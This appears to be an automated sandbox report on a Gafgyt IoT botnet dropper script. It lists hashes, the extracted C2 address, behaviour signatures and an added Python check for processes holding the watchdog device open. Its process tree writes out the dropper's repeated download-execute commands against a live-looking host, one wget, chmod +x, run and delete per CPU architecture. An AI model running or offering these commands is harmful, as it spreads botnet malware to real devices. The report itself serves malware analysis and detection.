Analysis
- max time kernel: 16s
- max time network: 18s
- platform: debian-9_mips
- resource: debian9-mipsbe-20240729-en
- resource tags: arch:mips, image:debian9-mipsbe-20240729-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 14-12-2024 15:05
Static task: static1
Behavioral task behavioral1: sample sex.sh, resource ubuntu1804-amd64-20240611-en
Behavioral task behavioral2: sample sex.sh, resource debian9-armhf-20240418-en
Behavioral task behavioral3: sample sex.sh, resource debian9-mipsbe-20240729-en
Behavioral task behavioral4: sample sex.sh, resource debian9-mipsel-20240226-en
General
- Target: sex.sh
- Size: 1KB
- MD5: 255decb3180bb0e03b43d0d6246c3977
- SHA1: c99637830a502bc731837adff300980a592e8316
- SHA256: 2d718fdd5a61973c8c4c9bd4e7f40e5e424dd39d446597efc4cb79889211f875
- SHA512: 0389441154ebc943637cecbd434c38567baf4eb068bc68184906ec5f1c61eee928b0a1b73f5de65fa8d02fedd686169d64519be2c4c75d45824da982247ee3fd
Malware Config
- Extracted: gafgyt
- 84.200.24.7:666
Signatures
- Detected Gafgyt variant (12 IoCs)
  resource / yara_rule: behavioral3/files/fstream-1.dat through behavioral3/files/fstream-12.dat, each matching family_gafgyt (12 files).
- Gafgyt family
- File and Directory Permissions Modification (1 TTPs, 13 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid / Process: 753 chmod, 766 chmod, 771 chmod, 776 chmod, 783 chmod, 824 chmod, 841 chmod, 851 chmod, 856 chmod, 736 chmod, 760 chmod, 796 chmod, 809 chmod
- Executes dropped EXE (12 IoCs)
  ioc / pid / Process: /tmp/mips 738 mips; /tmp/mipsel 754 mipsel; /tmp/sh4 761 sh4; /tmp/x86 767 x86; /tmp/arm61 772 arm61; /tmp/i686 777 i686; /tmp/ppc 784 ppc; /tmp/586 797 586; /tmp/m68k 811 m68k; /tmp/dc 825 dc; /tmp/dss 843 dss; /tmp/co 852 co
- Modifies Watchdog functionality (1 TTPs, 2 IoCs)
  Malware like Mirai modifies the watchdog to prevent it from restarting an infected system.
  description / ioc / Process: File opened for modification /dev/watchdog (mips); File opened for modification /dev/misc/watchdog (mips)
- Changes its process name (1 IoCs)
  description / pid / Process: Changes the process name, possibly in an attempt to hide itself; 738 mips
- System Network Configuration Discovery (1 TTPs, 6 IoCs)
  Adversaries may gather information about the network configuration of a system.
  pid / Process: 738 mips, 741 rm, 744 wget, 754 mipsel, 756 rm, 721 wget
- Writes file to tmp directory (12 IoCs)
  Malware often drops required files in the /tmp directory.
  description / ioc / Process: File opened for modification /tmp/co (wget); /tmp/mipsel (wget); /tmp/arm61 (wget); /tmp/m68k (wget); /tmp/i686 (wget); /tmp/ppc (wget); /tmp/586 (wget); /tmp/dc (wget); /tmp/dss (wget); /tmp/mips (wget); /tmp/sh4 (wget); /tmp/x86 (wget)
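The "Modifies Watchdog functionality" signature above records the mips payload opening /dev/watchdog and /dev/misc/watchdog. On a live host the safe way to look for the same behaviour is to read which processes hold the device open via /proc/<pid>/fd, not to open the device yourself: opening /dev/watchdog arms the timer, and closing it without the magic 'V' write can reboot the box on drivers built with nowayout. The script below is an added example by the editor, not part of this sandbox report; it takes the /proc root as a parameter so it can run against a constructed tree (built inline, with the PID and process name copied from the report) or a mounted image. The /dev/watchdog0 node is an addition for modern kernels; the rest of the node list is the page's.

```python
"""Find processes holding the hardware watchdog open (host-side check for the
'Modifies Watchdog functionality' behaviour). Added example, not report code."""
import os
import tempfile

# Nodes named in the report plus /dev/watchdog0, which modern kernels expose (assumption).
WATCHDOG_NODES = ("/dev/watchdog", "/dev/misc/watchdog", "/dev/watchdog0")


def watchdog_holders(proc_root="/proc", nodes=WATCHDOG_NODES):
    """Return {pid: (comm, [watchdog paths held open])} by following the
    /proc/<pid>/fd symlinks. Never open()s the device, so it cannot arm it."""
    holders = {}
    for entry in os.listdir(proc_root):
        if not entry.isdigit():          # skip self, sys, net, ...
            continue
        fd_dir = os.path.join(proc_root, entry, "fd")
        try:
            fds = os.listdir(fd_dir)
        except OSError:                  # process exited or not ours to read
            continue
        opened = []
        for fd in fds:
            try:
                target = os.readlink(os.path.join(fd_dir, fd))
            except OSError:
                continue
            if target in nodes:
                opened.append(target)
        if opened:
            try:
                with open(os.path.join(proc_root, entry, "comm")) as f:
                    comm = f.read().strip()
            except OSError:
                comm = "?"
            holders[int(entry)] = (comm, sorted(opened))
    return holders


def build_fake_proc(root, entries):
    """Constructed stand-in for /proc: entries = {pid: (comm, {fd: link target})}."""
    for pid, (comm, fds) in entries.items():
        fd_dir = os.path.join(root, str(pid), "fd")
        os.makedirs(fd_dir)
        with open(os.path.join(root, str(pid), "comm"), "w") as f:
            f.write(comm + "\n")
        for fd, target in fds.items():
            os.symlink(target, os.path.join(fd_dir, str(fd)))


def demo():
    """Fake tree mirroring the report: PID 738 (mips) holds /dev/watchdog open."""
    root = tempfile.mkdtemp()
    build_fake_proc(root, {
        1:   ("init", {0: "/dev/null"}),
        738: ("mips", {3: "/dev/watchdog", 4: "socket:[1234]"}),
    })
    return watchdog_holders(proc_root=root)


if __name__ == "__main__":
    print(demo())                # {738: ('mips', ['/dev/watchdog'])}
    print(watchdog_holders())    # the real host; needs root to see other users' fds
```

On a real host run it as root: without CAP_SYS_PTRACE the fd directories of other users' processes are unreadable and silently skipped.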
Processes
- /tmp/sex.sh: /tmp/sex.sh (PID 719)
  - /usr/bin/wget: wget http://84.200.24.7/mips (PID 721) [System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/chmod: chmod +x mips (PID 736) [File and Directory Permissions Modification]
  - /tmp/mips: ./mips (PID 738) [Executes dropped EXE; Modifies Watchdog functionality; Changes its process name; System Network Configuration Discovery]
  - /bin/rm: rm -rf mips (PID 741) [System Network Configuration Discovery]
  - /usr/bin/wget: wget http://84.200.24.7/mipsel (PID 744) [System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/chmod: chmod +x mipsel (PID 753) [File and Directory Permissions Modification]
  - /tmp/mipsel: ./mipsel (PID 754) [Executes dropped EXE; System Network Configuration Discovery]
  - /bin/rm: rm -rf mipsel (PID 756) [System Network Configuration Discovery]
  - /usr/bin/wget: wget http://84.200.24.7/sh4 (PID 757) [Writes file to tmp directory]
  - /bin/chmod: chmod +x sh4 (PID 760) [File and Directory Permissions Modification]
  - /tmp/sh4: ./sh4 (PID 761) [Executes dropped EXE]
  - /bin/rm: rm -rf sh4 (PID 764)
  - /usr/bin/wget: wget http://84.200.24.7/x86 (PID 765) [Writes file to tmp directory]
  - /bin/chmod: chmod +x x86 (PID 766) [File and Directory Permissions Modification]
  - /tmp/x86: ./x86 (PID 767) [Executes dropped EXE]
  - /bin/rm: rm -rf x86 (PID 769)
  - /usr/bin/wget: wget http://84.200.24.7/arm61 (PID 770) [Writes file to tmp directory]
  - /bin/chmod: chmod +x arm61 (PID 771) [File and Directory Permissions Modification]
  - /tmp/arm61: ./arm61 (PID 772) [Executes dropped EXE]
  - /bin/rm: rm -rf arm61 (PID 774)
  - /usr/bin/wget: wget http://84.200.24.7/i686 (PID 775) [Writes file to tmp directory]
  - /bin/chmod: chmod +x i686 (PID 776) [File and Directory Permissions Modification]
  - /tmp/i686: ./i686 (PID 777) [Executes dropped EXE]
  - /bin/rm: rm -rf i686 (PID 779)
  - /usr/bin/wget: wget http://84.200.24.7/ppc (PID 780) [Writes file to tmp directory]
  - /bin/chmod: chmod +x ppc (PID 783) [File and Directory Permissions Modification]
  - /tmp/ppc: ./ppc (PID 784) [Executes dropped EXE]
  - /bin/rm: rm -rf ppc (PID 787)
  - /usr/bin/wget: wget http://84.200.24.7/586 (PID 789) [Writes file to tmp directory]
  - /bin/chmod: chmod +x 586 (PID 796) [File and Directory Permissions Modification]
  - /tmp/586: ./586 (PID 797) [Executes dropped EXE]
  - /bin/rm: rm -rf 586 (PID 800)
  - /usr/bin/wget: wget http://84.200.24.7/m68k (PID 802) [Writes file to tmp directory]
  - /bin/chmod: chmod +x m68k (PID 809) [File and Directory Permissions Modification]
  - /tmp/m68k: ./m68k (PID 811) [Executes dropped EXE]
  - /bin/rm: rm -rf m68k (PID 814)
  - /usr/bin/wget: wget http://84.200.24.7/dc (PID 815) [Writes file to tmp directory]
  - /bin/chmod: chmod +x dc (PID 824) [File and Directory Permissions Modification]
  - /tmp/dc: ./dc (PID 825) [Executes dropped EXE]
  - /bin/rm: rm -rf dc (PID 828)
  - /usr/bin/wget: wget http://84.200.24.7/dss (PID 830) [Writes file to tmp directory]
  - /bin/chmod: chmod +x dss (PID 841) [File and Directory Permissions Modification]
  - /tmp/dss: ./dss (PID 843) [Executes dropped EXE]
  - /bin/rm: rm -rf dss (PID 846)
  - /usr/bin/wget: wget http://84.200.24.7/co (PID 848) [Writes file to tmp directory]
  - /bin/chmod: chmod +x co (PID 851) [File and Directory Permissions Modification]
  - /tmp/co: ./co (PID 852) [Executes dropped EXE]
  - /bin/rm: rm -rf co (PID 854)
  - /usr/bin/wget: wget http://84.200.24.7/scar (PID 855)
  - /bin/chmod: chmod +x scar (PID 856) [File and Directory Permissions Modification]
  - /tmp/scar: ./scar (PID 857)
  - /bin/rm: rm -rf scar (PID 858)
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 94KB
  MD5: 8463bb2a52278fccd845a2446f8be854
  SHA1: 7369b66a49a6066030c37e8e1a0ec19ab878e2ec
  SHA256: 19e6eb7e3ca3f073200b950dbfa30644d9afcbf99c74c650c8a0016eb0aea420
  SHA512: f92579021b6316079c55db56d94dc79b6f8dccd5eac1ca4b8451644b0df8297ed0a1203828bc25cc218da0badb89968fe5a7342d724044ff4ac4de8ff60ccfe7
- Filesize: 136KB
  MD5: 8be4d39830172bb4eb47b989973d349d
  SHA1: 2e55fa4c873a9646535f856ee8f3fbf24de6279f
  SHA256: 00ffb68e788d3e5e910d2e1d4a036a11f4b34274d9d2b281b1a9882c03907799
  SHA512: c38cf50e7c14b053e0cc9432920b6f3e576a7662b09dbbc1c16cbdff8a4b820122f1ebe3f5a969ba1e5c87e3c240183618b4e625a853aa13cd6c216b4e6fe016
- Filesize: 117KB
  MD5: 49f06082c95ca854779ecada9a788849
  SHA1: 9394600a9f7212ddc175659dc272ae4759c738b3
  SHA256: b1b260102dbf4bedc8045bf87820ca8304be082f17c34531f14c30c240ad08e1
  SHA512: 8ac1038399d5bf68dcbdc917148416da3d36aba2da9c1a4f298897b8411908ab7032a1e95ab205e129751164839febd78c43d97d6d5849cd98b35a79846a6da3
- Filesize: 123KB
  MD5: 1d28148f828971df08bca7f5b4fd0e0f
  SHA1: 91b1b9b7aa460dfa99ffa2ce7bde67a00c3f8237
  SHA256: 169154df3f7d61ab01e0fe96646800b2e18727adc5f0c9abddd57c1770a17afd
  SHA512: 3e7dbee01cfb5109fe2f55628257e6cc3962384ddce673912994ac7f3ab13db1d280ec341ddfa9ca3b81b2edcf90b3241f69a28b8b9dfe1941af466f906366a9
- Filesize: 124KB
  MD5: 4aaf4d4b417d7a5078a0e48f12653d81
  SHA1: d2b6785e877fae5c0ad5978f9d510e8cfdf5e102
  SHA256: e7026cb71392d47f04c12cb8c1591561e0d63b815142102bfea482dfd9635acb
  SHA512: dfa7c6185820f6da4e3512ce8455becea881798460542dc2b67e2a5a59e528371942b30430c6a7b51439fee9ec6eb7676b1bc87a04484da28c553fe049c029b1
- Filesize: 96KB
  MD5: 41f1dfcf258eab8a0845e9accc3b0174
  SHA1: 216756fb1769ffb855e39f62b2c3cab63c66eaee
  SHA256: b23ac5a469bbb1b8abb3c82fcd13d1dbbb27d82bb847b93a392e4efbeefcc48c
  SHA512: 4c4e9f1609c0faf6d76eb6a60cd86941fc69fe21c3634c851f923da9354a4f5967eb4b7875f8d16e2ca6e272beac280f8a4c1b64528765a515e5501906b503a1
- Filesize: 111KB
  MD5: c9d48ac85b3b184fd20b5bc3fb4872d3
  SHA1: ec02edde62edeeade7fce1b6a5f0390e242a4723
  SHA256: e8c1bbf011a3127022114e5a1a07fed193af7016aba66fe6ca378405db19b7de
  SHA512: fe2fcea215ee984228db99de7c88b4f9476ada843528ac4cc076ff076a1354cd499b8b4429e2f54e455df8fa84568c817c982fd2f10ba7233b4ceda0d86eada7
- Filesize: 148KB
  MD5: d6001ccc3698da0b114c8ecbf2f31bbc
  SHA1: 98403730633fd63e92b04c5f149a07668bd62012
  SHA256: 37cdc22e48013fc55d7e6d7e300a8fc1b8803d99b7cbd451bc16313982b51298
  SHA512: 096cbc89b0ba1d76a5524aa6ee98223c11dd3a2f2eb2a522b43ebce57004c67b656835d0b5bf6e8fc36956dae15684bfbf11cfb95c407415abf8e618ef8dd86d
- Filesize: 148KB
  MD5: 04680d0ce29c9e9c0b315df004e4e711
  SHA1: acbdd21883d584685ae4cf5bade335c83a03d120
  SHA256: e9d7c7273b9c1a1dc9885829f79bc8d44d2054ef074ebf8757e61c8e29c1c953
  SHA512: 05938331f8e14f842131e2ae0401ae32fb7fa1a3c8647f9a56c5b601867285d7b2cb1c84f2e361444af4fe1c74097e9bb5204fbaf91a1b0fa38d55823baf7bdd
- Filesize: 110KB
  MD5: 8a9b060beade95395607241a1ba2748f
  SHA1: 4cfb9674e8ef3653d1b1f4be28d7d71076c2df18
  SHA256: 5468d7962128a23f13a0074cdc95b2e7d6e2a5bd31a19b85db2076fbf61a62b2
  SHA512: 879120d420e039b45bbae9cefd543ba92200a5c8f153464daea6efcbcccf46a95eac725c8b5ccfbc48b8581038858eb9dfc2eb62ad5575d3e6c4cb634990d73c
- Filesize: 105KB
  MD5: 11f24d2812bd00bdb9119c5b5e77d70b
  SHA1: 0a983e68c941009b19c386d90d35d9642abfe713
  SHA256: dadf9d1330b764611ba37e94bbca21b493084ef2dddbc7ee8acb0203d4719b88
  SHA512: 170f0ca6296b17ddb41705ae092b7b02c7da08c0525e45446b6ced1ac3557065ab0dd108c7064e4e13e30f30a523a74eeddafae7a3d94c0c0fc82fb70bc7e249
- Filesize: 112KB
  MD5: b2a245611aaae902c4f5be372dc37327
  SHA1: 7accc90c3514bb07ff4c327b2b715b4f99a08cf9
  SHA256: 392d95c696d2fb3e5ee826c177215a91e5d31a59348fd582803fecff1ec315ad
  SHA512: b8d65369c6bfae0534457c9b126f8496cc060da71c6d3cfb5877acf3512525a204720a4d169bcbab69d5c3c3e5558f271bcba619eef94603d08673a3ce1af4fe